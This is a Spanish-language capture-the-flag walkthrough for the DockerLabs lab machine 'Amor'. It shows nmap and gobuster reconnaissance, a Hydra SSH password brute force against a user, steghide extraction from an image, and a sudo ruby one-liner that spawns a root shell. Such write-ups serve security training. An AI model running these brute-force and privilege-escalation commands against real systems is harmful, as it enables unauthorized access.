Amor

🚀Preparación del Entorno

El proceso para desplegar las máquinas de DockerLabs es bastante sencillo. Sigue estos pasos:

📌 Paso 1: Descargar el archivo CTF

Descarga el archivo ZIP del CTF que deseas utilizar.

📌 Paso 2: Descomprimir el archivo

Ejecuta el siguiente comando en la terminal:

unzip [nombre].zip

📂 Esto extraerá los siguientes archivos:

📌 Paso 3: Ejecutar el script de despliegue

Para iniciar el despliegue de la máquina virtual, ejecuta:

sudo bash auto_deploy.sh [nombre].tar

🕐 Después de unos minutos, el script te proporcionará la IP de la máquina lista para atacar.


🎯Resolución

🔍 Reconocimiento

Comenzamos realizando un escaneo con Nmap para identificar los puertos abiertos y los servicios disponibles en el objetivo

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

El escaneo revela que los servicios SSH y HTTP están activos
Pasted image 20241116191153.png
Vemos la página
Pasted image 20241116191018.png
Como segundo paso, realizamos un escaneo de los posibles directorios de la página web utilizando el siguiente comando:

gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


🕵️ Análisis de vulnerabilidades

Al examinar la página web, encontramos algunos detalles típicos de un CTF. Es muy importante prestar atención a cualquier información que pueda servir como pista. Se menciona que existen contraseñas débiles. Además, identificamos dos posibles nombres de usuario: Carlota y Juan, aunque se sugiere que el usuario Juan ha sido despedido.
Pasted image 20241116192103.png


🎯 Explotación

Intentaremos realizar un ataque de fuerza bruta con Hydra para verificar las credenciales de los usuarios. Usaremos el siguiente comando:

hydra -l carlota -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4
ssh carlota@172.17.0.2

📈 Escalada de privilegios

Lo primero que hacemos es explorar la carpeta personal del usuario en /home. Allí encontramos una carpeta llamada //fotos/, dentro de la cual hay una subcarpeta llamada vacaciones. En esta última, descubrimos una imagen llamada imagen.jpg. Descargamos la imagen para examinarlo mejor

scp carlota@172.17.0.2:/home/carlota/Desktop/fotos/vacaciones/imagen.jpg .

Pasted image 20241116193717.png
Al examinar la imagen, descubrimos que contiene un archivo oculto utilizando steghide, una herramienta de esteganografía. Para extraer los datos ocultos en la imagen imagen.jpg, usamos el siguiente comando:

steghide --extract -sf imagen.jpg

Ejecutamos el comando sudo -l para verificar qué podemos ejecutar como administrador sin necesidad de proporcionar una contraseña

sudo -l

Pasted image 20241116195425.png
Identificamos un servicio llamado RUBY que podemos ejecutar como administrador. Al consultar la página GTFOBins, encontramos que usando el siguiente comando podemos obtener privilegios de administrador:

sudo /usr/bin/ruby -e "exec '/bin/bash'"


¡Ya somos root!

Pasted image 20241116195950.png